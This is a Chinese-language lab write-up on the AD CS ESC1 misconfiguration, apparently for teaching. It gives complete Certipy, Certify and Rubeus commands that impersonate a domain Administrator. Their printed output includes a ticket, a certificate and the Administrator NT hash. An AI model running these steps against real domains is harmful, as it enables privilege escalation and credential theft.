ESC1
1. 什么是ESC1
其主要的配置错误在于,可以在证书中指定替代用户。
如果证书模板允许包含与发起证书请求(CSR)的用户不同的subjectAltName ( SAN ),那么我们将能够以域内任意用户的身份请求证书
Subject Alternative Name (SAN) 是一种扩展属性(也称为主题备用名称),它允许你在同一个 SSL/TLS 证书中指定多个用于标识服务器或用户的名称
攻击流程: 枚举CA证书模板--》寻找允许包含备用名称SAN的模板--》向ADCS请求对应的模板并在SAN中包含目标账户--》使用ADCS返回的证书以SAN中指定的账户进行身份验证。
2. 利用
2.1. 利用条件
- CA向低权限用户授予注册权限
- 关闭管理员审批
- 无需授权签名
- 证书模板的SID过于宽松、允许低权限用户注册此证书模板
- 证书模板定义了支持身份验证的EKU(拓展密钥用法)
- 证书模板允许请求者在
CSR中指定SAN
2.2. On Linux
2.2.1. 枚举
┌──(root㉿kali)-[~/Desktop/Academy/ADCS]
└─# certipy find -u 'blwasp@lab.local' -p 'Password123!' -dc-ip 10.129.22.58 -vulnerable -stdout
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 41 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 18 enabled certificate templates
[*] Finding issuance policies
[*] Found 29 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'lab-LAB-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'lab-LAB-DC-CA'
[*] Checking web enrollment for CA 'lab-LAB-DC-CA' @ 'LAB-DC.lab.local'
[!] Error checking web enrollment: [Errno 104] Connection reset by peer
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Template Name : ESC1
Display Name : ESC1
Certificate Authorities : lab-LAB-DC-CA
Enabled : True
Client Authentication : True Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : IncludeSymmetricAlgorithms
PublishToDs
Private Key Flag : ExportableKey
Extended Key Usage : Client Authentication Secure Email
Encrypting File System
Requires Manager Approval : False Requires Key Archival : False
Authorized Signatures Required : 0 Schema Version : 2
Validity Period : 99 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2023-05-01T16:53:05+00:00
Template Last Modified : 2023-07-05T11:47:16+00:00
Permissions
Enrollment Permissions
Enrollment Rights : LAB.LOCAL\Domain Admins
LAB.LOCAL\Domain Users
LAB.LOCAL\Enterprise Admins
Object Control Permissions
Owner : LAB.LOCAL\Administrator
Full Control Principals : LAB.LOCAL\Domain Admins
LAB.LOCAL\Enterprise Admins
Write Owner Principals : LAB.LOCAL\Domain Admins
LAB.LOCAL\Enterprise Admins
Write Dacl Principals : LAB.LOCAL\Domain Admins
LAB.LOCAL\Enterprise Admins
Write Property Enroll : LAB.LOCAL\Domain Admins
LAB.LOCAL\Domain Users
LAB.LOCAL\Enterprise Admins
[+] User Enrollable Principals : LAB.LOCAL\Domain Users
[!] Vulnerabilities ESC1 : Enrollee supplies subject and template allows client authentication.从枚举的信息可以看出:
- Authorized Signatures Required: 0 (不需要授权签名)
- Requires Manager Approval: False (不需要管理员批准)
- Client Authentication: True与Extended Key Usage: Client Authentication(满足其一即可)
- Enrollee Supplies Subject: True(允许指定
SAN) 关键利用点
2.2.2. 利用
https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation#esc1-enrollee-supplied-subject-for-client-authentication
为目标用户请求证书 (这一步可能会报错The NETBIOS connection with the remote host timed out,再次执行即可解决)
┌──(root㉿kali)-[~/Desktop/Academy/ADCS]
└─# certipy req -u 'BlWasp@lab.local' -p 'Password123!' -dc-ip 10.129.22.58 -ca lab-LAB-DC-CA -target LAB-DC.lab.local -template ESC1 -upn 'Administrator@lab.local' -sid S-1-5-21-2570265163-3918697770-3667495639-500
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 67
[*] Successfully requested certificate
[*] Got certificate with UPN 'Administrator@lab.local'
[*] Certificate object SID is 'S-1-5-21-2570265163-3918697770-3667495639-500'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
使用pfx证书进行认证
┌──(root㉿kali)-[~/Desktop/Academy/ADCS]
└─# certipy auth -pfx administrator.pfx -dc-ip 10.129.22.58
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'Administrator@lab.local'
[*] SAN URL SID: 'S-1-5-21-2570265163-3918697770-3667495639-500'
[*] Security Extension SID: 'S-1-5-21-2570265163-3918697770-3667495639-500'
[*] Using principal: 'administrator@lab.local'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@lab.local': aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe
2.3. On Windows
windows使用 certify.exe
2.3.1. 枚举
C:\Users\blwasp\Desktop>.\Certify.exe enum-templates --filter-enabled --filter-vulnerable
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v2.0.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=lab,DC=local'
[*] Classifying vulnerabilities in the context of built-in low-privileged domain groups.
[*] Listing info about the enterprise certificate authority 'lab-LAB-DC-CA'
[*] Certificate templates found using the current filter parameters:
Template Name : ESC1
Enabled : True
Publishing CAs : LAB-DC.lab.local\lab-LAB-DC-CA
Schema Version : 2
Validity Period : 99 years
Renewal Period : 6 weeks
Certificate Name Flag : ENROLLEE_SUPPLIES_SUBJECT
Enrollment Flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Manager Approval Required : False
Authorized Signatures Required : 0
Extended Key Usage : Client Authentication, Encrypting File System, Secure Email Certificate Application Policies : Client Authentication, Encrypting File System, Secure Email
Vulnerabilities
ESC1 : The template has a client authentication EKU and allows enrollees to supply subject.
Permissions
Enrollment Permissions
Enrollment Rights : LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Domain Users S-1-5-21-2570265163-3918697770-3667495639-513
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
Object Control Permissions
Owner : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
Write Owner : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
Write Dacl : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
Write Property : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
也可以使用powershell枚举
PS C:\Tools> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))' -SearchBase 'CN=Configuration,DC=lab,DC=local'
DistinguishedName Name ObjectClass ObjectGUID
----------------- ---- ----------- ----------
CN=OfflineRouter,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local OfflineRouter pKICertificateTemplate f1f9e21c-f31c-4d4e-85de-4682867c4d82
CN=ESC1,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local ESC1 pKICertificateTemplate 210ae26a-2668-413c-aad8-983ea2a5434a
2.3.2. 利用
C:\Users\blwasp\Desktop>.\Rubeus.exe asktgt /user:administrator /certificate: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 /getcredentials /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
[*] Action: Ask TGT
[*] Got domain: lab.local
[*] Using PKINIT with etype rc4_hmac and subject: CN=Black Wasp, CN=Users, DC=lab, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'lab.local\administrator'
[*] Using domain controller: fe80::9aa2:4d04:7c43:e9f6%18:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
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
ServiceName : krbtgt/lab.local
ServiceRealm : LAB.LOCAL
UserName : administrator (NT_PRINCIPAL)
UserRealm : LAB.LOCAL
StartTime : 4/20/2026 4:38:36 PM
EndTime : 4/21/2026 2:38:36 AM
RenewTill : 4/27/2026 4:38:36 PM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : +rQCSAJd0VU32CWO03/l0Q==
ASREP (key) : 4B2A833FBAA26DB936F01EDCDACED8C2
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : 2B576ACBE6BCFDA7294D6BD18041B8FE
也可以转换base64为pfx文件到linux下使用 (注意Wndows的空格和换行)
┌──(root㉿kali)-[~/Desktop/Academy/ADCS]
└─# cat esc1.b64|tr -d ' \n\r'|base64 -d >esc1_clean.pfx
┌──(root㉿kali)-[~/Desktop/Academy/ADCS]
└─# certipy auth -pfx esc1_clean.pfx -dc-ip 10.129.22.58
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@lab.local'
[*] Using principal: 'administrator@lab.local'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@lab.local': aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe
Warning
- 有时域控制器不支持 PKINIT 协议,这可能是因为其证书未包含
Smart Card Logon扩展密钥用法(EKU)。 - 大多数情况下,当 EKU 缺失时,域控制器会返回
KDC_ERR_PADATA_TYPE_NOSUPP错误。
但是,包括 LDAP 在内的多种协议都支持 Schannel,即通过 TLS 进行认证。 - 需要注意的是,"Schannel 认证"这一术语源自 Schannel SSP(安全服务提供程序),这是 Microsoft 在 Windows 系统中实现的 SSL/TLS 组件,因此 Schannel 认证本质上就是 SSL/TLS 客户端认证
可以参考这篇文章的具体说明Certificates and Pwnage and Patches, Oh My! | by Will Schroeder | Posts By SpecterOps Team Members